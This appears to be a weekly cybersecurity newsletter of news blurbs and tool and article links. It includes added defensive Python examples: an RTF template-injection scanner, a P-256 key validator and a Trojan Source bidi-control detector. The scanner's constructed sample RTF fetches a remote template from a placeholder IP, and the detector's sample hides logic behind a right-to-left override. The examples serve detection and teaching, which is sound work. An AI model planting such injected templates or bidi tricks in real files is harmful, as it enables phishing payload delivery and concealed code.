CyberSecNews Weekly - 0x06-W4821
News
Hackers Increasingly Using RTF Template Injection Technique in Phishing Attacks
Hackers have been increasingly using the RTF Template Injection method in widespread phishing attacks.
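The check a defender wants for this item, added here as an example that is not from the news article or from any vendor tool: a Python scanner that pulls the target of an RTF "\template" destination and flags targets that Word would fetch from a remote location. It assumes the injected template sits as plain text right after the control word, in the form {\*\template http://...}; obfuscated variants (hex escapes, split control words) are out of scope, and the RTF documents below are constructed samples, not real malware.

```python
import re

# Matches the \template control word (optionally inside a \* ignorable destination)
# and captures everything up to the closing brace of that group. Assumption: the
# target is plain text, not hex-escaped.
_TEMPLATE_RE = re.compile(rb"\\template(?![A-Za-z])\s*([^{}]*)\}")

# Prefixes that mean the template is fetched from somewhere other than the local disk.
_REMOTE_PREFIXES = (b"http://", b"https://", b"ftp://", b"file://", b"\\\\")


def find_template_targets(rtf):
    """Return every \\template target found in the RTF bytes, whitespace-trimmed."""
    return [m.group(1).strip() for m in _TEMPLATE_RE.finditer(rtf)]


def is_remote(target):
    """True if the template target would be fetched over the network (URL or UNC path)."""
    return target.lower().startswith(_REMOTE_PREFIXES)


def scan_rtf(rtf):
    """Return (verdict, targets); verdict is 'remote-template', 'local-template' or 'clean'."""
    targets = find_template_targets(rtf)
    if not targets:
        return "clean", targets
    if any(is_remote(t) for t in targets):
        return "remote-template", targets
    return "local-template", targets


# Constructed samples (not real documents); 203.0.113.10 is an RFC 5737 documentation address.
MALICIOUS_RTF = (b"{\\rtf1\\ansi\\deff0"
                 b"{\\*\\template http://203.0.113.10/update.dotm}"
                 b"{\\fonttbl{\\f0 Calibri;}}\\f0 Quarterly report attached.}")
BENIGN_RTF = b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0 Calibri;}}\\f0 Quarterly report attached.}"

if __name__ == "__main__":
    for name, blob in (("malicious", MALICIOUS_RTF), ("benign", BENIGN_RTF)):
        print(name, scan_rtf(blob))
```

A legitimate corporate template pointing at a local path or a file share is common, so "local-template" is informational; "remote-template" with an HTTP(S) target in a mailed attachment is the signal worth alerting on.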
Top 5 Costly Data Breaches of 2021 and Its Impact
From Astoria Company to Reindeer, this article discusses the biggest data breaches of 2021, where the companies paid a huge price and suffered major repercussions.
Tools
sottlmarek/DevSecOps
A list of resources in the DevSecOps space.
trailofbits/pip-audit
Audits Python environments and dependency trees for known vulnerabilities.
danielmiessler/SecLists
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
Articles
An Illustrated Guide to Elliptic Curve Cryptography Validation
Elliptic Curve Cryptography (ECC) has become the de facto standard for protecting modern communications. ECC is widely used to perform asymmetric cryptography operations, such as to establish shared secrets or for digital signatures. However, insufficient validation of public keys and parameters is still a frequent cause of confusion, leading to serious vulnerabilities, such as leakage of secret keys, signature malleability or interoperability issues. The purpose of this blog post is to provide an illustrated description of the typical failures related to elliptic curve validation and how to avoid them in a clear and accessible way.
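The public-key validation the post argues for, written out as an added example that is not code from the post or its author: full validation of a NIST P-256 public key in pure Python (infinity check, field-range check, curve-equation check, subgroup-order check), applied to a valid key, an off-curve neighbour and a point on a different curve. The curve arithmetic and the SEC1 decoder are minimal implementations written for this example; the invalid inputs are constructed.

```python
# P-256 domain parameters (FIPS 186-4 / SEC 2). Points are affine (x, y) tuples;
# None stands for the point at infinity.
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)


def point_add(p1, p2):
    """Affine addition on y^2 = x^3 + A*x + B over GF(P); None is infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:            # p1 == -p2 (also covers doubling a point with y == 0)
            return None
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P    # tangent slope (doubling)
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P           # chord slope (addition)
    x3 = (lam * lam - x1 - x2) % P
    y3 = (lam * (x1 - x3) - y1) % P
    return (x3, y3)


def scalar_mult(k, point):
    """Double-and-add. Not constant-time; acceptable here because only public data is used."""
    result = None
    while k:
        if k & 1:
            result = point_add(result, point)
        point = point_add(point, point)
        k >>= 1
    return result


def parse_sec1_uncompressed(data):
    """Decode the 65-byte SEC1 encoding 0x04 || x || y into an (x, y) tuple."""
    if len(data) != 65 or data[0] != 0x04:
        raise ValueError("expected 65-byte uncompressed point starting with 0x04")
    return (int.from_bytes(data[1:33], "big"), int.from_bytes(data[33:], "big"))


def validate_p256_public_key(point):
    """Return (True, "ok") or (False, reason). Every check must pass, in this order."""
    # 1. The point at infinity is never a valid public key.
    if point is None:
        return False, "point at infinity"
    x, y = point
    # 2. Coordinates must be canonical field elements (rejects non-canonical encodings).
    if not (0 <= x < P and 0 <= y < P):
        return False, "coordinate out of field range"
    # 3. The point must satisfy the curve equation. Skipping this enables invalid-curve
    #    attacks: scalar multiplication with an off-curve point actually runs on a curve
    #    with a different B, whose small subgroups leak the private scalar piece by piece.
    if (y * y - (x * x * x + A * x + B)) % P != 0:
        return False, "point not on curve"
    # 4. The point must have order N. P-256 has cofactor 1, so (3) already implies this,
    #    but on cofactor > 1 curves this is the check that blocks small-subgroup attacks.
    if scalar_mult(N, point) is not None:
        return False, "point not in the prime-order subgroup"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs: the generator, an off-curve neighbour, and (1, 1), which lies
    # on the different curve y^2 = x^3 + A*x + 3 rather than on P-256.
    for candidate in (G, (G[0], G[1] + 1), (1, 1), None, (P, G[1])):
        print(candidate, "->", validate_p256_public_key(candidate))
```

In a real deployment the checks run on the decoded peer key before it is ever multiplied by a private scalar; a library that only decodes (step 2) and skips step 3 is exactly the failure mode the post describes under leakage of secret keys.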
Data Exfiltration via CSS + SVG Font
This post shows that SVG fonts and CSS can be used to read a page's text contents.
Why I have settled on XChaCha20+Blake3 as the AEAD suite of choice for my projects
This might get me some looks, but I have pretty solidly decided to go in on using XChaCha20+Blake3 as the AEAD of choice for my future open source work. There are numerous reasons for this decision, but it mainly comes down to the desire for defense in depth, and a deep dislike of fundamental properties of polynomial MACs.
Trojan Source and Python
The Trojan Source vulnerabilities have been rippling through various development communities since their disclosure on November 1. The oddities that can arise when handling Unicode, and bidirectional Unicode in particular, in a programming language have led Rust, for example, to check for the problematic code points in strings and comments and, by default, refuse to compile if they are present. Python has chosen a different path, but work is underway to help inform programmers of the kinds of pitfalls that Trojan Source has highlighted.
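Since CPython does not reject these code points for you, here is the kind of check a team can run in CI, added as an example that is not from the article or from the Python project: it locates the bidirectional embedding, override and isolate controls in Python source and reports whether each one sits inside a string literal, a comment, or bare code, using the standard tokenize module to tell those apart. The sample source is constructed in the shape of the "commenting-out" trick, where a right-to-left override makes a string literal render as if it ended earlier and was followed by a harmless comment.

```python
import io
import sys
import tokenize
import unicodedata

# Bidirectional controls abused by Trojan Source: the embeddings/overrides (U+202A..E)
# and the isolates (U+2066..9). The LRM/RLM marks are deliberately not included.
BIDI_CONTROLS = {
    0x202A, 0x202B, 0x202C, 0x202D, 0x202E,   # LRE, RLE, PDF, LRO, RLO
    0x2066, 0x2067, 0x2068, 0x2069,           # LRI, RLI, FSI, PDI
}


def _string_and_comment_spans(source):
    """Return [((row, col), (row, col), kind)] for every string and comment token."""
    spans = []
    try:
        for tok in tokenize.generate_tokens(io.StringIO(source).readline):
            if tok.type == tokenize.STRING:
                spans.append((tok.start, tok.end, "string"))
            elif tok.type == tokenize.COMMENT:
                spans.append((tok.start, tok.end, "comment"))
    except Exception:
        # A control character outside a literal can make the tokenizer give up
        # (TokenError/SyntaxError); keep the spans seen so far, the rest counts as code.
        pass
    return spans


def find_bidi_controls(source):
    """Return [(row, col, 'U+XXXX', unicode name, context)] for each control found."""
    spans = _string_and_comment_spans(source)
    hits = []
    for row, line in enumerate(source.splitlines(), start=1):
        for col, ch in enumerate(line):
            cp = ord(ch)
            if cp not in BIDI_CONTROLS:
                continue
            context = "code"
            for start, end, kind in spans:
                if start <= (row, col) < end:   # tokenize rows are 1-based, cols 0-based
                    context = kind
                    break
            hits.append((row, col, f"U+{cp:04X}", unicodedata.name(ch), context))
    return hits


# Constructed sample: line 2 renders as   if access_level != "user":  # check if admin
# while the interpreter compares against a longer string that never matches "user".
SAMPLE = (
    'access_level = "user"\n'
    'if access_level != "user\u202e \u2066# check if admin\u2069":\n'
    '    print("You are an admin.")\n'
    'x = 1  # \u2067totally harmless\u2069\n'
)


if __name__ == "__main__":
    paths = sys.argv[1:]
    sources = [(p, open(p, encoding="utf-8").read()) for p in paths] or [("<sample>", SAMPLE)]
    for name, text in sources:
        for row, col, cp, uname, ctx in find_bidi_controls(text):
            print(f"{name}:{row}:{col}: {cp} {uname} in {ctx}")
```

Run it with a list of files as a pre-commit or CI step and fail the build on any hit; the context column separates the string and comment cases the Trojan Source paper describes from a stray control character elsewhere, which CPython itself will already refuse to compile.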
“Why the hell even use Deep Learning?” Twitter Thread edition
Rich Harang (@rharang) discusses how and when to use DL in your security products.
eset_jumping_the_air_gap_wp.pdf
Air-gapped networks are a very common architecture in high-security or critical environments (such as OT networks). In this white paper ESET describes several frameworks used to attack and bypass them.
IR & Reversing
Tracking a P2P network related to TA505
For the past few months, NCC Group has been tracking very closely the operations of TA505 and the development of different projects (e.g. Clop) by them.
Just another analysis of the njRAT malware – A step-by-step approach – CYBER GEEKS